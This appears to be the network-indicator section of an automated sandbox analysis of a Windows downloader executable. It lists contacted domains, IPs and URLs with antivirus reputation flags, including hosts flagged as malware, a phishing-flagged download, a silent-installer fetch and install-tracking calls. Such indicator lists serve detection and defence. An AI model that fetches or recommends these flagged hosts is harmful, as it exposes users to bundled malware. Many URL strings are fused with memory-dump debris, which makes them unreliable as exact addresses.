https://union.2345cdn.n0%Avira URL Cloudsafe
http://api.flmgr.net/v1/client/extsp100%Avira URL Cloudmalware
http://www.founder.com.cn/cnher0%Avira URL Cloudsafe
http://api.flmgr.net:80/v1/client/exts100%Avira URL Cloudmalware
http://www.ascendercorp.com/typedesigners.htmlm=0%Avira URL Cloudsafe
http://api.nasyeo.com/log/close0%Avira URL Cloudsafe
http://static-img.flmgr.net/20230713170812.png100%Avira URL Cloudmalware
http://api.nasyeo.com/log/adSOFTWARE0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
dl.360safe.com.dl.360qhcdn.com
104.192.108.19
truefalse
    unknown
    api.flmgr.net
    123.57.49.36
    truetrue
      unknown
      www.wshifen.com
      103.235.46.40
      truefalse
        unknown
        api.nasyeo.com
        60.205.148.178
        truetrue
          unknown
          emerg.hcdnw.nozj.cn.gslb.v6.c.cdnhwc2.com
          113.142.34.181
          truefalse
            unknown
            s.360.cn
            180.163.251.230
            truefalse
              high
              inf.safe.360.cn
              180.163.237.185
              truefalse
                high
                hcdnd101.vip.cdnhwczxh101.com
                120.52.95.245
                truefalse
                  unknown
                  hcdnd102.gslb.c.cdnhwc2.com
                  218.12.76.161
                  truefalse
                    unknown
                    hcdnw101.gslb.c.cdnhwc2.com
                    120.52.95.236
                    truefalse
                      unknown
                      download.ihsdus.cn
                      unknown
                      unknownfalse
                        unknown
                        img.onlinedown.net
                        unknown
                        unknownfalse
                          high
                          static.flmgr.net
                          unknown
                          unknownfalse
                            unknown
                            dl.360safe.com
                            unknown
                            unknownfalse
                              high
                              www.baidu.com
                              unknown
                              unknownfalse
                                high
                                www.onlinedown.net
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://api.flmgr.net/log/client/site_soft?Action=down_start&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://s.360.cn/hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=201&r=0&d=3112701&tag=kittipfalse
                                    high
                                    http://api.flmgr.net/log/client/run?User=e3c4aca4bf472f3bc70d155d55d5bb2f&InstallDate=2023-08-04&ChannelCode=2&Ver=1.0.7.17&StartMode=0&OsVer=10.0&Action=runkit&step=1&Intact=1&Miss=&RunMode=0&UserEv=0&Sdsoft=0true
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://s.360.cn/hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=218&r=0&d=3112701&tag=kittipfalse
                                      high
                                      http://api.flmgr.net/log/client/site_soft?Action=down_suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&Checks=1&Err=0true
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://api.flmgr.net/log/client/install?Action=open&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer=true
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://api.nasyeo.com/api/infotrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://static.flmgr.net/kit/KitTip.dllfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://s.360.cn/hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=2004&r=0&d=3112701&tag=kittipfalse
                                        high
                                        https://dl.360safe.com/gf/KitTip/KitTip.cabfalse
                                          high
                                          http://api.nasyeo.com/log/nexttrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://img.onlinedown.net/download/202201/084735-61d4eaa756820.jpgfalse
                                            high
                                            http://s.360.cn/hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=0&r=0&d=3112701&tag=kittipfalse
                                              high
                                              http://api.nasyeo.com/log/closetrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://api.flmgr.net/log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode=2&Ver=1.0.7.17&OsVer=10.0&Sdsoft=0&Softid=10042231&Filename=_____NCM______2_10042231.exe&IsUpdgade=0&OldVer=true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://s.360.cn/hips/update/inst.htm?m=b8a4400180ee20f44982cb4d73d6fcd7&m2=3b2907f96b378f57275538e3aa2275c022a86ca52985&v=3002253&s=324&r=0&d=3112701&tag=kittipfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://api.nasyeo.com:80/log/closeh_____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://api.flmgr.net:80angfang-AREACUCC1-CACHE23_____NCM______2_10042231.exe, 00000000.00000003.599814629.00000000061B2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.sandoll.co.kr(_____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.fontbureau.com/designers_____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431688863.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://api.flmgr.net/v1/api/system_____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://api.flmgr.net/log/client/install?Action=suc&User=e3c4aca4bf472f3bc70d155d55d5bb2f&ChannelCode_____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/4_____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comalsy_____NCM______2_10042231.exe, 00000000.00000003.428179724.00000000064FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://api.flmgr.net/log/client/site_softhttp://api.flmgr.net/log/client/install_____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.carterandcone.comn:_____NCM______2_10042231.exe, 00000000.00000003.423682627.00000000064FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPlease_____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/Y0_____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://groups.google.com/forum/?pli=1#_____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://apisvchost.exe_____NCM______2_10042231.exe, 00000000.00000003.600782714.00000000061A9000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599752351.00000000061A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://static.flmgr.net/green/1.0.6.2.png_____NCM______2_10042231.exe, 00000000.00000003.538483821.00000000061A1000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661196321.0000000001A98000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.founder.com.cn/cntte;_____NCM______2_10042231.exe, 00000000.00000003.422522906.0000000006505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.zhongyicts.com.cn_____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423601209.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423537700.0000000006525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.carterandcone.como._____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.sandoll.co.kr=_____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    http://api.flmgr.net/v1/client/soft/find_keyname?SoftID=%d/taskidcurrentspeedremaintimestatuscodedow_____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://downloader.regeeve.com/client/debugq_____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sandoll.co.krx_____NCM______2_10042231.exe, 00000000.00000003.422331717.00000000064FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/P_____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426232518.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://api.flmgr.net/v1/client/configs50_____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A4F000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://github.com/v8/v8/wiki/Debugging-Protocol_____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000012.00000002.778872704.00007FFC1B439000.00000002.00000001.01000000.0000001A.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/J_____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426232518.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://client.flmgr.net/home/recommend?taskbar_closeget_____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/A_____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://narwhaljs.org)_____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://www.jiyu-kobo.co.jp/=_____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://union.2345cdn.nows_____NCM______2_10042231.exe, 00000000.00000003.661015928.000000000625D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734490139.0000000006261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://static.flmgr.net/green/1.2.3_____NCM______2_10042231.exe, 00000000.00000003.538483821.00000000061A1000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.carterandcone.coml_____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.flmgr.net/win_agreement.html_____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.538371355.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661196321.0000000001A98000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.zhongyicts.com.cnltE_____NCM______2_10042231.exe, 00000000.00000003.423601209.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423663375.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.423537700.0000000006525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://union.2345cdn.net/union3422_pic/2345pic_lm_511196_v10.10_silent.exe_____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/x_____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://api.nasyeo.com/_____NCM______2_10042231.exe, 00000000.00000003.528631713.0000000001ADB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/s_____NCM______2_10042231.exe, 00000000.00000003.424265906.00000000064F3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.424690560.00000000064F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zlib.net/D_____NCM______2_10042231.exe, 00000000.00000003.618841166.000000000F530000.00000004.00001000.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://gstararch.gstarcad.cn/2023/2D/230529/GstarCAD2023_ZH_x64.exe_____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://www.flmgr.net/win_fl_agreement.htmlRptMain.xml_USERPROFILEGeneralDisplayNameSoftidWebidSdsoft_____NCM______2_10042231.exe, 00000000.00000000.369683496.0000000000811000.00000002.00000001.01000000.00000003.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/a_____NCM______2_10042231.exe, 00000000.00000003.425031286.00000000064F5000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426232518.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425741821.00000000064FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426159389.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.425825661.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426103185.00000000064FD000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.426072751.00000000064FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://static-img.flmgr.net/20230717170650.png_____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://api.flmgr.net/log/client/stay?User=%s&InstallDate=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=_____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.fontbureau.comionmJ_____NCM______2_10042231.exe, 00000000.00000002.734533612.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.661144107.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432093652.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432454977.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432564971.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434764757.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434235117.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431916842.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433771181.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432042950.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433408005.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433174815.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432958424.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.435073362.0000000006503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://api.flmgr.net/v1/client/theme?User=e3c4aca4bf472f3bc70d155d55d5bb2f&Ver=1.0.7.17&Winver=10.0&_____NCM______2_10042231.exe, 00000000.00000003.420756858.0000000001A7D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.420609026.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.420915268.0000000001A86000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.founder.com.cn/cn/bThe_____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://api.flmgr.net/e_____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.fontbureau.comicva_____NCM______2_10042231.exe, 00000000.00000003.432093652.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432454977.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432564971.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434764757.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.434235117.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431916842.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433771181.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432042950.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431765779.0000000006503000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431688863.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433408005.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.431841529.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.433174815.0000000006500000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.432958424.0000000006502000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.435073362.0000000006503000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://pc-package.wpscdn.cn/wps/dow_____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000012.00000002.778872704.00007FFC1B439000.00000002.00000001.01000000.0000001A.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://api.flmgr.net/m_____NCM______2_10042231.exe, 00000000.00000002.734322356.000000000620C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://img.onlinedown.net/download/202201/084735-61d4eaa756820.jpg21769_____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://api.nasyeo.com:80/log/nextrs_____NCM______2_10042231.exe, 00000000.00000003.661038246.0000000006227000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.734451911.0000000006228000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.onlinedown.net/iopdfbhjl/10042231?module=download&t=website&v=20230805004821s=1&Err=0D_____NCM______2_10042231.exe, 00000000.00000003.593264592.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.600413657.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.599905174.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000002.733702466.000000000486C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.typography.netD_____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://fontfabrik.com_____NCM______2_10042231.exe, 00000000.00000002.734649152.0000000007992000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.carterandcone.com8_____NCM______2_10042231.exe, 00000000.00000003.423682627.00000000064FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.onlinedown.net/_____NCM______2_10042231.exe, 00000000.00000002.734322356.00000000061A0000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575430988.00000000061B3000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.575226837.00000000048FB000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.593443636.00000000061F2000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.593264592.00000000048FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/staff/dennis.htmf_____NCM______2_10042231.exe, 00000000.00000003.429012421.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429095949.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429061335.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.428992249.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429076660.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429045987.0000000006525000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.429108521.0000000006525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://wiki.commonjs.org/wiki/Unit_Testing/1.0_____NCM______2_10042231.exe, 00000000.00000003.618923470.000000001002D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://api.nasyeo.com/log/next0_____NCM______2_10042231.exe, 00000000.00000003.538128273.000000000486C000.00000004.00000020.00020000.00000000.sdmp, _____NCM______2_10042231.exe, 00000000.00000003.528207931.000000000486C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.fonts.com_____NCM______2_10042231.exe, 00000000.00000003.421630345.000000000650B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
